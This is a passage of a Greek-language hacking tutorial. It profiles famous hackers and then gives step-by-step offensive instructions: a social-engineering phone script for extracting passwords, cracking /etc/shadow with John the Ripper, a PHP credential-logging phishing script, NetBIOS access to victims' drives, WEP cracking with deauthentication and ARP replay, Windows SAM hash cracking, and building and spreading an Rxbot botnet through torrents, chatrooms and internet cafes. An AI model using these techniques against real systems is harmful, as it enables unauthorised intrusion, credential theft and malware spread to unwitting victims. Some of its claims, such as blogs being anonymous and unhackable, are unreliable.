Professional Documents
Culture Documents
by Thanasaras!
3. Jonathan James
Στα 16 του χρόνια ο James, έγινε ο πρώτος ανήλικος που καταδικάζεται
για ηλεκτρονικά εγκλήματα με ποινή φυλάκισης. Αργότερα παραδέχτηκε ο
ίδιος ότι το έκανε για πλάκα και απολάμβανε τις προκλήσεις. Ο James
"χτυπούσε" μεγάλους δημόσιους οργανισμούς όπως ένα παράρτημα του
Υπουργείου Δικαιοσύνης και έπαιρνε κωδικούς για να έχει πρόσβαση
σε απόρρητους λογαριασμούς e-mail. Εκτός από αυτά ο James απέκτησε
πρόσβαση στους υπολογιστές της NASA και έκλεψε πολύτιμα software
συνολικής αξίας 1,7 εκατ. δολαρίων. Αυτή την στιγμή ο James επιχειρεί να
αναπτύξει την δικιά του επιχείρηση ασφάλειας υπολογιστών.
4. Robert Tappan Morris
Ο Morris είναι γιος ενός πράκτορα της NSA και δημιουργός του Morris
worm. To worm είναι ένα είδος ιού που εξαπλώνεται και αυτό-αντιγράφεται
ανεξέλεγκτα καταστρέφοντας χιλιάδες μηχανήματα. Το συγκεκριμένο worm
ήταν το πρώτο που αναπτύχθηκε και διαδόθηκε μέσω του internet. Ο Morris
το δημιούργησε ενώ ήταν φοιτητής στο Cornel και ισχυρίστηκε ότι το έκανε
απλά για να δει πόσο μεγάλο ήταν το internet εκείνη την στιγμή.
Το worm ωστόσο άρχισε να διαδίδεται ανεξέλεγκτα προκαλώντας
πρόβλημα σε χιλιάδες υπολογιστές κάτι που κόστισε στον Morris ένα βαρύ
πρόστιμο και 400 ώρες κοινωνικής εργασίας. Σήμερα o Morris είναι
καθηγητής στο πανεπιστήμιο MIT στο τμήμα Computer Science και ο τομέας
έρευνας του είναι η αρχιτεκτονική των δικτύων υπολογιστών.
5. Kevin Poulsen
Πιο γνωστός με το παρατσούκλι του, Dark Dante, ο Kevin Poulsen έγινε
γνωστός εισβάλοντας στο τηλεφωνικό κέντρο του ραδιοφωνικού σταθμού
KISS-FM του Los Angeles παρεμβαίνοντας στις κληρώσεις και κερδίζοντας
μεγάλα δώρα μεταξύ των οποίων και μια Porsche. Το FBI άρχισε να
ασχολείται με τον Poulsen αφού απέκτησε πρόσβαση σε αρχεία της
υπηρεσίας και αποσπούσε σημαντικές και απόρρητες πληροφορίες. Η
ειδικότητά του ήταν οι τηλεφωνικές γραμμές και αποκτούσε πρόσβαση σε
μεγάλα δίκτυα προκαλώντας το χάος. Αφού συνελήφθη σε ένα
σουπερμάρκετ καταδικάστηκε για πέντε χρόνια, και ενώ ήταν στην φυλακή
δούλευε ως δημοσιογράφος και αργότερα εκδότης των Wired News.
Αυτοί ήταν και οι πιο γνωστοί παράνομοι hackers στην ιστορία των Η.Π.Α
αλλά δεν θα πρέπει να ξεχνάμε και την άποψη των πολλών που ισχυρίζονται
ότι οι μεγαλύτεροι και καλύτεροι hackers είναι αυτοί που δεν τους ξέρει
κανείς!
Deface
Deface είναι όταν ένας χάκερ αλλάζει την αρχική σελίδα μιας ιστοσελίδας με
σκοπό να προβάλλει την αιτία που χάκαρε την συγκεκριμένη ιστοσελίδα.
Δείτε από κάτω ένα Deface της Σκηνής(Greek Hacking Scene -GHS),
πατριωτικού, και όχι εθνικιστικού Ελληνικού κινήματος, και ίσως το
μεγαλύτερο στην Ευρώπη που απαρτίζεται από πολλούς Έλληνες χάκερς.
Passwords - Κωδικοί
Στις μέρες μας, οι κωδικοί είναι το μόνο μέτρο προστασίας στα
περισσότερα site και υπολογιστικά συστήματα. Έχει καταντήσει να είναι ο
ποιο εύκολος και απλός τρόπος για να εισβάλλει ένας hacker σε ένα
σύστημα.
-hacker: Για σας κύριε <όνομα υπαλλήλου> , το όνομα μου είναι <τυχαίο
όνομα> και καλώ από την software service. Αυτήν την στιγμή
προσπαθούμε να αναβαθμίσουμε το λογισμικό στους υπολογιστές της
εταιρίας σας αλλά δεν μπορούμε να συνδεθούμε στην βάση δεδομένων σας.
Θα μπορούσατε μήπως να με βοηθήσετε με τα στοιχεία εισόδου (κωδικοί)
ώστε να μην βρω τον μπελά μου με το αφεντικό μου?! Θα σας ξανά
τηλεφωνήσω σε λίγα λεπτά μόλις πραγματοποιηθεί η αναβάθμιση.
Προφανώς ο υπάλληλος της εταιρίας θα δώσει στον hacker τον κωδικό
χωρίς καμία πιστοποίηση.
Dictionary Attacks είναι η τεχνική που ο hacker προσπαθεί να βρει τον
κωδικό εισόδου ενός άλλου χρήστη χρησιμοποιώντας μια λίστα(wordlist)
από πιθανούς κωδικούς πρόσβασης. Παρακάτω ακολουθεί ένας οδηγός για
την χρήση του Hydra.
Εγκαταστήστε το Hydra, και τρέξτε την έκδοση που υποστηρίζεται από το
λειτουργικό σας σύστημα.Στην περίπτωση μας θέλουμε να σπάσουμε έναν
κωδικό σε ένα ftp(File Transfer Protocol) server έτσι συμπληρώνουμε την
διεύθυνση του server (π.χ.Ftp.tripod.com), το πρωτόκολλο (π.χ. Ftp, ανάλογα
με την περίπτωση) και την θύρα (στην περιπτωση μας 21).
ΕΓΚΑΤΑΣΤΑΣΗ-ΧΡΗΣΗ
Η εγκατάσταση που ακολουθεί παρακάτω, αναφέρεται σε ένα σύστημα
GNU/linux i686.
1.πηγαίνουμε σε μια directory για να ξεκινήσουμε ανοίγουμε ένα Shel και
γράφουμε,
Α. $ cd /var/tmp
2.κατεβάζουμε το John The Ripper
Β. $ wget http://www.openwal .com/john/b/john-1.6.tar.gz
3. αποσυμπιέζουμε το John The Ripper
Γ. $ tar xzvpf john-1.6.tar.gz
4. μπαίνουμε στην directory των "πηγών" του John The Ripper
Δ. $ cd john-1.6/src
5. γινόμαστε root
Ε. $ su
και γράφουμε...
Ζ. # make linux-x86-mmx-elf
( για τους ubuntu-αδες, προσπερνάτε το βημα 5 και γράφεται sudo make
linux-x86-
mmx-elf!)
6. μπαίνουμε στην directory
Η. # cd . /run/
Πρώτα από όλα πρέπει να χρησιμοποιήσουμε την εντολή που ενώνει σε
ένα αρχείο όλα τα hash των αρχείων
/etc/passwd και /etc/shadow στο αρχειο passwords.
Γράφουμε λοιπόν....
# ./unshadow /etc/passwd /etc/shadow > passwords
Ώστε να ακολουθήσει έπειτα μια διαδικασία,αρκετά χρονοβόρα, bruteforce
όπου μπορεί να μας δώσει πολύ καλά αποτελέσματα.
Γράφουμε...
# ./john passwords
Χρησιμοποιώντας την παρακάτω εντολή μπορείτε να εμφανίσεται τις
επιλογές του προγράμματος.
# ./john
Σε αυτό το σημείο θα σας δώσω ένα απλό παράδειγμα της χρήσης του...
Δημιουργούμε τον user "test"! με password την λεξη "secret"!
Θα επιχειρήσουμε με το John The Ripper να βρούμε την password του εν
λόγω
χρήστη στο σύστημα μας.
1. # adduser test
2. # passwd test [secret]
3. # ./unshadow /etc/passwd /etc/shadow > passwords
4. # ./john -i:alpha passwords
Loaded 4 passwords with 4 different salts........κ.λ.π.
Έτσι λοιπόν σε ελάχιστο χρόνο βρίσκεται τον password "secret" του user
"test"!
Μπορείτε να συνεχίσετε την ανάλυση η να την διακόψετε από το
"πατώντας" CTRL+C. Αν θέλετε να συνεχίσετε από εκεί που σταμάτησε το
πρόγραμμα γράφετε
# ./john -restore
Με την παρακάτω εντολή, δύνασθε ανά πάσα στιγμή να "βλέπετε" τους
password σε κάθε στιγμή της διαδικασίας...
# ./john -show passwords
test:secret:502:502: /home/test:/bin/bash
1 password cracked, 3 left
Τώρα μπορείτε να "σβήσετε" τον χρήστη του παραδείγματος μας με την
# userdel test
Rainbow Tables 'Ένα rainbow table είναι μια τεράστια λίστα από Hash
για κάθε πιθανό συνδυασμό χαραχτήρων. Ένα κωδικός Hash είναι ένας
κωδικός ο οποίος έχει μετατραπεί σε κάτι εντελώς διαφορετικό με την
χρήση μαθηματικών αλγορίθμων.
Τα hash (από κατασκευής) δεν δεν μπορούν να αποκρυπτογραφηθούν.
Ένας πολύ κοινός τρόπος κρυπτογράφησης των hash είναι ο αλγόριθμος
MD5 ο χρησιμοποιέιτε στα περισσότερα web sites. Ας πούμε ότι εγγράφεσε
σε ένα site, χρησιμοποιείς εναν κωδικό αυτός ο κωδικός μέσω του
αλγόριθμου MD5 μετατρέπετε σε hash και αποθηκεύεται στο site. Όταν
συνδέεσαι στο site ο κωδικός που εισάγεις μετατρέπετε σε hash μέσω του
αλγόριθμου MD5 και συγκρίνεται με το hash του κωδικού που είχες δηλώσει
κατά την εγγραφή σου στο site, αν είναι ίδια, τότε σύνδεση σου στο site
επιτρέπεται. Κάθε συνδυασμός χαρακτήρων δημιουργεί ένα
διαφορετικό hash, έτσι άμα έχεις μια λίστα από hash για κάθε πιθανό
χαρακτήρα μπορείς να σπάσεις κωδικούς πολύ πιο γρήγορα από ότι με
μεθόδους brute-force και dictionary. Το μόνο κακό είναι οτι καταλαμβάνουν
τεράστιο χώρο στο σκληρό δίσκο του υπολογιστή. Ένα παράδειγμα του
rainbow table cracking θα δούμε στο κεφάλαιο
“Windows Password Hacking”.
Domain names
Είναι βασική γνώση για κάποιον που θέλει να ασχοληθεί με το "θέμα" να
γνωρίζει τι είναι τα domain names. Αρχικά να πούμε πως αν κάποιος θέλει
να φτιάξει μια ιστοσελίδα πρέπει σε πρώτη φάση να πληρώσει το όνομά της.
Για παράδειγμα το Facebook, έχει "αγοράσει" το όνομα
Facebook.com(πληρόνοντας κάθε χρόνο ένα ποσό γύρω στα 15 ευρώ). Το
Facebook ονομάζεται domain name και το .com ονομάζεται top level domain
tld. Χάρις την αρχή Internet Assigned Numbers Authority (IANA)
κατηγοριοποιεί τα top-level domains σε τρεις τύπους top level domain
tld(χωρίς αυτό να σημαίνει πως είναι μόνο αυτοί). Για παράδειγμα οι
κατλήξεις που παραπέμπουν σε χώρες, που τις περισσότερες φορές
αποτελούνται από 2 γράμματα. Π.χ. .gr, .fr, .cn, .tr, .co.uk(Ην. Βασίλειο) κτλ.
Αυτά τα top level domains tld ονομάζονται ειδικότερα top level domain tld
cc.
Φυσικά υπάρχουν και άλλα 2 είδη. Το ένα είναι οι γνωστές μας
καταλήξεις(που απαρτίζονται από 3 γράμματα) . gov , .org , .mil , .com ...
Αυτά ονομάζονται top level domain gTLD.
Η τελευταία κατηγορία είναι τα δομικά top-level domains, με μοναδικό το
arpa.
Τι είναι τα blogs. Τα blogs είναι κανονικές ιστοσελίες με λίγες διαφορές
που θα πούμε παρακάτω. H βασικότερη διαφορά με μία ιστοσελίδα τύπου
mysite.gr, είναι πως στα blogs δεν χρειάζετε να πληρώσουμε απολύτως
τίποτα για να φτιάξουμε μια τέτοιου είδους ιστοσελίδα. Η μορφή μιας
τέτοιας ιστοσελίδας θα είναι αντίθετα με τις άλλες τύπου
mysite.blogspot.com. Δηλαδή πάντα μετά το όνομα που επιλέξαμε θα είναι
το blogspot.com. Επίσης αξίζει να πούμε πως τα blogs είναι απολύτως
ανώνυμα, αν τα "ανοίξουμε" και τα διαχειριζόμαστε από κάποιο νετ καφέ.
Αυτός είναι και ο λόγος που αρκετοί hackers έχουν και ένα προσωπικό blog
που γράφουν τις απόψεις τους κτλ. Είναι βασικότατο για κάποιον "χάκερ"
να έχει ένα blog ώστε να μάθει να πειραματίζεται με τον κώδικα της σελίδας
του, πάντα γραμμένο σε γλώσσα HTML. Αυτό είναι βασικό γιατί μπορεί να
μάθει πιο εύκολα τη γλώσσα μέσα από τη χρήση που θα τον βοηθήσει στα
μελλοντικά του Defaces. Και τέλος τα blogs δεν χακάρονται καθόλου εύκολα
γιατί είναι "powerade by google", ανήκουν στην Google δηλαδή. Αν κάποιος
καταφέρει να "χακάρει" ένα blog, τότε είναι συνώνυμο σα να χάκαρε το
Google.
<?php
$datum = date(‘d-m-Y / H:i:s’);
$ip = $_SERVER['REMOTE_ADDR'];
header(“Location: Εδώ βάζουμε το redirect url”);
$handle = fopen(“password.txt”, “a”);
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “IP: $ip | Date: $datum (Date=0 GTM)\r\n”);
fwrite($handle, “\r\n”);
fclose($handle);
setcookie (“user”, “empty”, time()+3600);
exit;
?>
Network Hacking
Footprinting Είναι η τεχνική συλλογής πληροφοριών σχετικά με τα
υπολογιστικά συστήματα και των οντοτήτων που ανήκουν αυτά. Έτσι
λοιπόν πριν από μία επίθεση σε ένα δίκτυο αυτήν η διεργασία είναι ιδιαίτερα
χρήσιμη καθώς έχει σαν σκοπό την εύρεση όσο το δυνατόν περισσότερων
πληροφοριών σχετικά με το δίκτυο του άλλου. Αλλά πώς κάποιος να
συλλέξει αυτές της πληροφορίες?
Τι θα πρέπει να ψάξουμε αρχικά;
Καταρχάς η ιστοσελίδα της εταιρείας είναι το αρχικό μας σημείο καθώς
θα μας δώσει εύκολα και αβίαστα τις πρώτες μας πληροφορίες.Χρήσιμα
στοιχεία που μπορούμε να βρούμε εκεί μέσα είναι τα εξής:Αριθμοί
τηλεφώνων,emails,ονόματα,τοποθεσίες και άλλες εταιρείες που σχετίζονται
με τον στόχο μας.Επίσης πολλές φορές υπάρχουν στον πηγαίο κώδικα των
ιστοσελίδων πληροφορίες αρκετά χρήσιμες στα σχόλια.Οπότε κοιτάμε και τα
σχόλια μήπως βρούμε κάτι ενδιαφέρον.
Ακόμα οι μηχανές αναζήτησης μπορούνε να μας
βοήθησουνε ακόμα περισσότερο στο να φτιάξουμε το προφίλ του στόχου
μας.
Καθορισμός των Domain Names και Network Blocks;
Το επόμενο μας βήμα είναι να βρούμε ποια είναι τα Domain Names της
εταιρείας και το εύρος των IP's που της αντιστοιχούν στο δίκτυο της.Η
ανεύρεση αυτών των στοιχείων γίνετια ως εξής:
Χρησιμοποιώντας το query whois σε βάσεις δεδομένων που έχουν
καταχωρημένα τα register domains.Για την Ευρώπη για παράδειγμα μία
τέτοια ιστοσελίδα είναι το www.ripe.net
Υπάρχουν 5 queries που μπορούν να χρησιμοποιηθούν με την εντολή
whois και μπορούν να μας αποδώσουν πολύ κρίσιμες πληροφορίες για την
επίθεση μας.Τα queries αυτά είναι:Το registrar query,τo organizational
query,το domain query,το network query και το point of contact query.
Παράδειγμα:
Χρησιμοποιούμε κατά κύρια βάση την ιστοσελίδα
www.networksolutions.com για να ψάξουμε για την εταιρεία που θέλουμε σε
περίπτωση που είναι Ελληνική θα χρησιμοποιήσουμε το query whois σε
αυτό το site για το domain MARFININVESTMENTGROUP.COM θα πάρουμε τα
ακόλουθα αποτελέσματα:
Domain Name: MARFININVESTMENTGROUP.COM
Registrar: ONLINENIC, INC.
Whois Server: whois.onlinenic.com
Referral URL: http://www.OnlineNIC.com
Name Server: NS.MARFINBANK.GR
Name Server: NS1.MARFINGROUP.GR
Status: clientTransferProhibited
Updated Date: 26-feb-2011
Creation Date: 10-may-2007
Expiration Date: 10-may-2010
NetBIOS Hacking.
Αν ένας υπολογιστής για παράδειγμα έχει ανοίξει το port 139, τότε είμαστε
σε θέση να κάνουμε το γνωστό netbios hacking.
Ξεκινάμε λοιπόν. Φια αρχή θα πρέπει να κατεβάσουμε το angry IP scanner ,
το οποίο είναι το καλύτερο πρόγραμμα που επικεντρόνεται στο να σκανάρει
ΙΡ διευθύνσεις.
Πάμε να ψάξουμε όλες τις ΙΡ, και να βρούμε ποια, ή ποιές από αυτές έχουν
τη συγκεκριμένη πόρτα ανοικτή. Πώς θα το κάνουμε αυτό;
Πολύ απλά ανοίγουμε το πρόγραμμα και πατάμε tools>preferences>ports και
μέσα στο κουτάκι βάζουμε την πόρτα που θέλουμε να ψάξει ως ανοικτή.
Πατάμε οκ, και ξεκινάμε το σκανάρισμα(μπορούμε εμείς να επιλέξουμε το
εύρως των ΙΡ που θέλουμε να σκανάρουμε.)
Και τώρα; Κατά 90% (αν δε σας ζητήσει κωδικό) μόλις πάτε στον
"υπολογιστής μου"(Win+E) θα παρατηρήσετε έναν ακόμη σκληρό δίσκο(!)
στον υπολογιστή σας. Αυτός είναι ο σκληρός δίσκος(C:/) του θύματος!!
Βρήκαμε αρκετές ανοιχτές ports μαζί με τις υπηρεσίες τους, παρακάτω
δίνετε μια λίστα με υπηρεσίες που αντιστοιχούν στις ποιο γνωστές ports.
20 FTP data (File Transfer Protocol)
21 FTP (File Transfer Protocol)
22 SSH (Secure Shel )
23 Telnet
25 SMTP (Send Mail Transfer Protocol)
43 whois
53 DNS (Domain Name Service)
68 DHCP (Dynamic Host Control Protocol)
80 HTTP (HyperText Transfer Protocol)
110 POP3 (Post Office Protocol, version 3)
137 NetBIOS-ns
138 NetBIOS-dgm
139 NetBIOS
143 IMAP (Internet Message Access Protocol)
161 SNMP (Simple Network Management Protocol)
194 IRC (Internet Relay Chat)
220 IMAP3 (Internet Message Access Protocol 3)
443 SSL (Secure Socket Layer)
445 SMB (NetBIOS over TCP)
1352 Lotus Notes
1433 Microsoft SQL Server
1521 Oracle SQL
2049 NFS (Network File System)
3306 MYSQL
4000 ICQ
5800 VNC
5900 VNC
8080 HTTP
Wireless Hacking
Wep Cracking Τρέχουμε την διανομή Backtrack. Ανοίγουμε την κονσόλα
που είναι το δεύτερο εικονίδιο κάτω αριστερά. Γράφουμε iwconfig
Και στην λίστα με τα δίκτυα κοιτάμε το όνομα του ασύρματου (από τώρα
και στο εξής eth1) Κλείνουμε την κονσόλα, και παμε στο πρώτο εικονίδιο
κάτω αριστερά. Το ανοίγουμε, παμε τέρμα πάνω στο BackTrack, στην
συνέχεια Radio Network Analysis, μετα 80211, Al , και μετά στο γνωστό
Kismet.
Το kismet είναι ρυθμισμένο ήδη να βάλει την κάρτα σε monitor, όταν ανοίξει,
δείχνει τα διαθέσιμα ασύρματα δίκτυα...
Πατάμε s και στη συνέχεια c για να βάλει τα δίκτυα σε σειρά με βάση το
channel που εκπέμπουν. Αν θέλετε πατήστε m για να το κάνετε να σκάσει
(εμένα με εκνευρίζει ο θόρυβος που κάνει σε κάθε πακέτο!!).
Πατάμε L (κεφαλαίο L δηλ. shift+L) για να κλειδώσει το kismet στην επιλογή
που θέλουμε. Πατάμε enter και σημειώνουμε το ssid, το bssid και το channel.
Πατάμε q για να βγούμε, και Q για να κλείσει το kismet.
Ανοίγουμε την κονσόλα πάλι και πληκτρολογούμε,
airodump-ng eth1 --ivs -w capture --bssid ff:ff:ff:ff:ff:f1 --channel 1 και
enter, όπου eth1 το όνομα που είδαμε στο iwconfig, όπου ff:ff:ff:ff:ff:f1 το
bssid του στόχου που γράψαμε απο το kismet, όπου (channel) 1 το κανάλι
που γράψαμε από το kismet, όπου capture το όνομα του αρχείου που
αποθηκεύουμε, Με την airodump-ng ... --ivs καταγράφουμε στο
αρχειο(capture.ivs) που καθορίσαμε στην -w, τα πακέτα που "ακούμε" από
το ΑP με bssid ff:ff:ff:ff:ff:f1, δηλαδή από το στόχο μας.
Για το σπάσιμο 64bit κλειδιού θέλουμε από 50k έως 200k πακέτα, και
ενός 128bit κλειδιού από 200k έως 700k!! Όπως θα διαπιστώσατε, τα πακέτα
είναι πολλά και ο ρυθμός μικρός. Θα αργήσουμε όπως φαίνεται. Πρέπει
λοιπόν να επισπεύσουμε την διαδικασία. Αφήνουμε ανοιχτό το airodump-ng,
ανοίγουμε νέα κονσόλα και γράφουμε, aireplay-ng eth1 -a ff:ff:ff:ff:ff:f1
--deauth 0 και enter όπου eth1 το όνομα που είδαμε στο iwconfig, όπου
ff:ff:ff:ff:ff:f1 το bssid του στόχου που γράψαμε απο το kismet, με την
aireplay-ng ... --deauth 0 λέμε στο AP να αποσυνδέσει όλους τους clients.
Έτσι όταν ξαναπροσπαθήσουν να συνδεθούν θα δούμε τα πακέτα να
ανεβαίνουν. Μπορούμε στην εντολή να πρσθέσουμε -c ff:ff:ff:ff:ff:f2 πριν το
--deauth, όπου ff:ff:ff:ff:ff:f2 η mac του client (φαίνεται στο kismet), οπότε και
θα αφαιρέσουμε το 0 από το τέλος. Και πάλι όμως τα πακέτα δεν
ανεβαίνουν γρήγορα, αφήστε που αν συνεχίσουμε να αποσυνδέουμε τους
clients κάποιος θα καταλάβει κάτι. Πατάμε ctrl+c για να σταματήσει το
deauth. Γράφουμε, aireplay-ng eth1 -b ff:ff:ff:ff:ff:f1 -m 68 - n 68 -h
ff:ff:ff:ff:ff:ff --arpreplay όπου ff:ff:ff:ff:ff:f1 το bssid του στόχου που γράψαμε
απο το kismet, Με αυτήν κάνουμε το εξής: Προσπαθούμε να βρούμε ένα
πακέτο( πιο σωστά να κάνουμε capture), το οποίο να περνά από το AP για
αληθινό, προσπαθούμε δηλαδη να το ξεγελάσουμε στέλνοντας το πακέτο
που πιάσαμε, ξανα και ξανα, δημιουργώντας κυκλοφορία. Κάποια στιγμη θα
δείτε "(got 1 ARP requests), sent ##
packets...". Τότε θα δείτε τα πακέτα στο airodump να εκτοξεύονται.
Αφήστε το airplay να στέλνει πακέτα και το airodump να αποθηκεύει.
Έχουμε σχεδόν τελειώσει... Ανοίγουμε άλλη μια κονσόλα και γράφουμε,
aircrack-ng -f 2 -b ff:ff:ff:ff:ff:f1 -n 128 -q capture*.ivs και enter
όπου ff:ff:ff:ff:ff:f1 το bssid του στόχου που γράψαμε απο το kismet,
όπου, 128 τα bit του κλειδιού (64/128/256/512), όπου capture το όνομα του
αρχείου που καταγράφει το airodump.
Με την airocrack-ng -f 2, ψάχνουμε στο αρχείο που αποθηκεύει το
airodump για το κλειδί . Όταν το aircrack τελειώσει θα έχουμε στην οθόνη
μας το κλειδί του δικτύου. Το σπάσιμο γίνεται και με άλλα linux, με τα
airodump, aircrack, aireplay και kismet που τα κατεβάζετε εύκολα. Οι εντολές
μπορεί να είναι διαφορετικές ανάλογα με την έκδοσή τους.Είδατε τι απλό
είναι? Περάστε σε WPA λοιπόν. Το WPA είναι πολύ καλύτερη μέθοδος, με ένα
passphrase αρκετά μεγάλο, όπως s1g@mhnm3vre1p0t3k@n3n45p4p4r@5
δεν νομίζω ότι θα έχετε κανένα
πρόβλημα. Επιθέσεις βέβαια υπάρχουν, ίσως σε άλλο how to. Η διαδικασία
είναι σχεδόν ίδια, μόνο που καταγράφουμε όλα τα πακέτα και όχι μόνο τα
ivs, και ψάχνουμε με brute force και όχι με στατιστικές μεθόδους, οπότε και
γίνεται αρκετά δύσκολο, αν όχι απίθανο . Μπορείτε να δείτε Ένα ελληνικό
επεξηγηματικό τιτόριαλ στο youtube
εδώ http://www.youtube.com/watch?v=owazIVWp-rc .
Windows Hacking
• Κατεβάστε και εγκαταστήστε το Ophcrack, τρέξτε το Ophcrack. Κάντε
κλικ στο “Load” και μετά στο “Encrypted SAM” θα σας ανοίξει ένα νέο
παράθυρο, τώρα πρέπει να βρείτε τον φάκελο όπου βρισκονται
κρυπτογραφημένα οι κωδικοί των χρηστών των windows. Αυτός ο φάκελος
βρισκεται μέσα στον φάκελο “system32” και ονομάζεται “config” η διαδρομή
που πρέπει να ακολουθήσετε είναι“.../WINDOWS/system32/config”. Αφού
επιλέξετε τον φάκελο “config” στο
Ophcrack θα εμφανιστεί μια λίστα των χρηστών των windows μαζί με τους
κωδικούς τους σε μορφή Hash. Σε αυτόν τον οδηγό μας ενδιαφέρει ο
χρήστης “Administrator” του οποίου ο κωδικός βρίσκετε στη στήλη “NT
Hash” (όπως στην εικόνα).
Μέχρι τώρα έχουμε πάρει τον κωδικό του χρήστη που μας ενδιαφέρει σε
μορφή Hash, ήρθε η ώρα να “σπάσουμε” την κρυπτογράφηση hash. Αυτό
μπορούμε να το κάνουμε με δύο τρόπους είτε α) μέσω του υπολογιστή μας
(δεν σας το συνιστώ λόγω της μικρής επεξεργαστικής ισχύς των
προσωπικών υπολογιστών θα πάρει υπερβολικά πολύ χρόνο) είτε β) μέσω
ενός online server που η κύρια λειτουργία του είναι να “σπάει” Hash. Στον
οδηγό αυτόν θα εφαρμόσουμε την δεύτερη μέθοδο, το site που θα
χρησιμοποιήσουμε για να σπάσουμε τo hash ειναι
το(http://www.md5decrypter.co.uk/ntlm-decrypt.aspx).
συμπληρώστε το hash στο κενό όπως την εικόνα)
Μέσα σε λίγα δευτερόλεπτα θα σας έχει δώσει τον κωδικό του χρήστη. Σε
περίπτωση που δεν μπορέσει να βρει τον κωδικό μπορείτε να στείλετε το
hash στον ιδιοκτήτη του site (http://www.md5decrypter.co.uk/contact-
me.aspx) και να σας το σπάσει αυτός με “rainbow tables”.
ΣΗΜΕΙΩΣΗ: O ADMIN ΤΗΣ ΣΥΓΚΕΚΡΙΜΕΝΗΣ ΙΣΤΟΣΕΛΙΔΑΣ ΕΙΝΑΙ ΛΙΓΟ
ΜΑΛΑΚΑΣ ΟΠΟΤΕ ΠΡΟΣΟΧΗ ΣΤΟ ΤΙ ΓΡΑΦΕΤΕ...
Malware
• Το “Malware”, συντομογραφία που προκύπτει από το συνδυασμό των
λέξεων malicious software, είναι ένας συλλογικός όρος που χρησιμοποιείται
γενικά για τον προσδιορισμό ιών και άλλων τύπων επιβλαβών
προγραμμάτων. Αναφέρεται σε όλα τα προγράμματα που εκκινούν (συχνά
επιβλαβείς) διαδικασίες, χωρίς τη συναίνεση του χρήστη.
• Τι είναι το Worm
Είναι ένα πρόγραμμα που μολύνει τους υπολογιστές που είναι συνδεμένοι σε
κάποιο δίκτυο. Αν ένας υπολογιστής το έχει και συνδεθεί σε ένα δίκτυο, θα
μολυνθούν και όλοι οι υπόλοιποι υπολογιστές που είναι συνδεμένοι σε αυτό.
• Τι είναι το Spyware
Είναι ένα πρόγραμμα που χρησιμοποιείται για να παρακολουθεί τις
δραστηριότητες του μολυσμένου υπολογιστή. Ένας υπολογιστής που έχει
κολλήσει spyware, παρακολουθείται από κάποιο τρίτο άτομο και πιο
συγκεκριμένα, αυτό το τρίτο άτομο μπορεί να δει πχ τι πληκτρολογούμε (για
usernames και passwords σε sites), κλπ, όπως είναι τα γνωστά μας
προγράμματα, keyloggers.
Ακόμα υπάρχουν και άλλα προγράμματα, με βάση τα keyloggers, τα οποία
ονομάζονται RAT(Remote Administrator Tool), που παρέχουν στον
επιτιθέμενο να πάρει τον έλεγχο του υπολογιστή του θύματος. Μερικά από
αυτά είναι το Cybergate, ProRAT, DarkComet.
• Τι είναι τα Adwares
Είναι τα προγράμματα που κολλάμε και πολύ απλά μας φέρνουν με ύπουλο
τρόπο διαφημίσεις στον υπολογιστή μας, χωρίς την έγκρισή μας.
Χρησιμοποιούν bandwidth της σύνδεσής μας στο internet, περιορίζοντάς μας
σε πιο χαμηλές ταχύτητες και ξεπετάνε συνέχεια διαφημίσεις, χωρίς να
μπορούμε να κάνουμε κάτι.
Crypters
Είναι προγράμματα που "φιλτράρουν" τους προαναφερθέντες ιούς(γενικά)
ώστε να τους κάνουν μη ανιχνεύσιμους προς τα αντιικά(antivirus) και με
αυτόν τον τρόπο να τους περνάνε σαν κάποια άκακα προγραμματάκια.
• 5.O ιός θα είναι με όνομα Rbot.exe στο Rxbot 7.6 > Debug folder !
Είστε έτοιμοι!!!! Ο Ιός είναι έτοιμος!!! Το μόνο που έχετε να κάνετε είναι να
τον δώσετε σε άλλους αλλά και να βλέπετε τα botakia να μπαίνουν ένα ένα
στο irc δίκτυό σας! Όμως δε μιλήσαμε ακόμα για τις εντολές τις οποίες
περιέχουν τα bots. Δε χρειάζεται να πούμε πολλά. Υπάρχει ιστοσελίδα
συγκεκριμένη με τις εντολές.
http://anonym.to/?http://rapidshare.com/files/21542921/cmands.html
Για να κατεβάσετε το mirc έτσι ώστε να μπορείτε να μπείτε στο irc δίκτιο
σας:
http://mirc.com/
• Tέλος κλείνοντας με το tutorial μου θα θελα να σας πω δυο λογάκια στο
πως θα μπορέσετε να προστατέψετε εσάς και τα bots σας, επίσης μερικούς
τρόπους για να κάνετε τη botnet μεγαλύτερη καθώς και μερικά public δίκτια
στα οποία θα μπορούσατε χωρίς να φτιάξεται ενα δικό σας να βάλετε τη
botnet σας. Για να προστατέψετε τα bots στο κανάλι όπου τα χετε θα
συνιστούσα να το έχετε σε secret mode. Επίσης να χει κωδικό ή αλλιώς key.
Τέλος αν θέλετε και μόνο δική σας επιλογή βάζετε το κανάλι m , δηλαδή
moderated, για να μη τρώει πολυ flood ο server και επιβαρύνεται άσκοπα.
Όσων αφορά την εξάπλωση της botnet σας, μπορείτε να φτιάξεται torrents
και να τα στείλετε σε μεγάλους trackers όπως mininova και piratebay, να
στείλετε τον ιό σε chatrooms, σε φίλους, στα internet cafe, σε warez
ιστοσελίδες, και πολλοί άλλοι τρόποι τους οποίους πιστεύω ότι μπορείτε και
μόνοι σας να σκεφτείτε. Τέλος μερικά public δίκτια όπου θα μπορούσατε να
βάλετε τη botnet σας είναι τα dalnet, undernet, efnet. Τώρα έχετε την
ικανότητα να φτιάχνετε έναν από τους πιο επικίνδυνους ιούς που υπάρχουν
αυτή τη στιγμή στον κόσμο των υπολογιστών!
Web Hacking
• Cross Site Scripting (xss)
Τον τελευταίο καιρό (2-3 χρόνια) οι επιθέσεις XSS έχουν αυξηθεί
τρομακτικά, οι λόγοι είναι πολλοί, μερικοί απ' αυτούς είναι η ευκολία, η
ευρεία ανάπτυξη webbased εφαρμογών, η έλλειψη φαντασίας των web
developers όταν σχεδιάζουν μια εφαρμογή κ.α. Αυτό το κείμενο λέει αυτό
ακριβώς που αναγράφεται στον τίτλο του, μην περιμένετε τίποτα
περισσότερο. Αν και όπως θα καταλάβεται όταν φτάσετε στο τέλος του, οι
XSS attacks είναι τόσο απλές μερικές φορές που το μόνο που χρειάζεσται
είναι φαντασία και δημιουργικότητα.
Τι είναι οι XSS attacks;
Αρχικά ονομάζονταν CSS (Cross-Site Scripting) και αυτό που μπορούν να
κάνουν είναι να επιτρέπουν σε κάποιον attacker να εισάγει (inject) κώδικα σε
